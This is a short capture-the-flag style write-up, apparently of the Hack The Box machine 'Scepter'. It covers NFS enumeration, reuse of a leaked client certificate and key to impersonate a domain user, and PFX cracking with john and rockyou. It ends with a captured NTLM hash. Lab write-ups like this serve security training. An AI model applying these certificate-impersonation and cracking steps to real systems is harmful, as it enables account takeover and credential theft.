Malleum Knowledge Base

scepter

3 min read

Enumeration

10.10.11.65

sudo nmap -sC -sV -oA scepter 10.10.11.65
  • The nmap scan show there is nfs share
showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)
sudo mount -t nfs -o vers=3 10.10.11.65:helpdesk helpdesk -o nolock

Mounted NFS Share

We have baker.crt and baker.key file. and pfx file for clark,lewis and scott.

openssl x509 -in baker.crt -text -noout

πŸ” Key Findings from baker.crt

πŸ‘€ User Identity

  • Common Name (CN): d.baker

  • Email Address: d.baker@scepter.htb

  • UPN (User Principal Name): d.baker@scepter.htb

  • SID: S-1-5-21-74879546-916818434-740295365-1106 β€” used in Windows authentication systems.

πŸ›οΈ Domain Info

  • Domain: scepter.htb

  • CA: scepter-DC01-CA β€” internal domain controller (probably AD CS)

πŸ” Certificate Usage

  • Key Usage: Digital Signature, Key Encipherment

  • Extended Key Usage:

    • Client Authentication

    • EFS (Microsoft Encrypted File System)

    • Email Protection

βœ… This cert is meant for client TLS auth β€” possibly used for smartcard logon or mutual TLS on internal web portals / VPNs / RDP / WinRM.

🎯 Next Steps

1. Check for Matching Private Key

Since you have baker.key, try pairing it with the cert:

openssl x509 -noout -modulus -in baker.crt | openssl md5
openssl rsa -noout -modulus -in baker.key | openssl md5

If the hashes match, it’s a valid cert+key pair = impersonation possible!

You can now:

  • Use curl, openssl, or impacket tools with this client certificate

  • Possibly authenticate to internal HTTPS services or Active Directory (via LDAP/TLS, WinRM, etc.)

2. Hunt for HTTPS with Client Auth

From your Nmap files, grep for HTTPS services:

grep -i 'https\|ssl' scepter.nmap

Try connecting:

curl -v --cert baker.crt --key baker.key https://<target>

Or test mutual TLS with openssl:

openssl s_client -connect <target>:443 -cert baker.crt -key baker.key

If you see Verify return code: 0 (ok) or get a 200/302 response: βœ… you’re authenticated.

3. Try Certificate-Based Auth for Impacket Tools

If baker.key + baker.crt are valid and you find SMB, LDAP, or WinRM:

# With LDAP
ldapsearch -H ldaps://<target> -D "d.baker@scepter.htb" -w '' -E pr=1000/noprompt -b "DC=scepter,DC=htb"
 
# Or with Impacket (if certauth supported)
python3 certi.py auth -pfx cert.pfx -target scepter.htb

Or emulate a smartcard login with modified tools (like PKINITtools or Impacket+Certauth patch).

4. Crack PFX Files

To potentially expand your access:

pfx2john scott.pfx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

These may also contain valid certs/keys like d.baker.

🧠 Summary

FindingValue
Cert for d.baker@scepter.htbReal domain user
Private key in baker.keyCan likely impersonate user
Cert is valid until Nov 2025Not expired
TLS client auth enabledCan be used for services like HTTPS, WinRM, LDAP

Would you like help validating the key and cert, or using them in an actual authentication attempt?

python3 /opt/JohnTheRipper/run/pfx2john.py lewis.pfx | tee -a lewis

DO this for all

Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

Graph View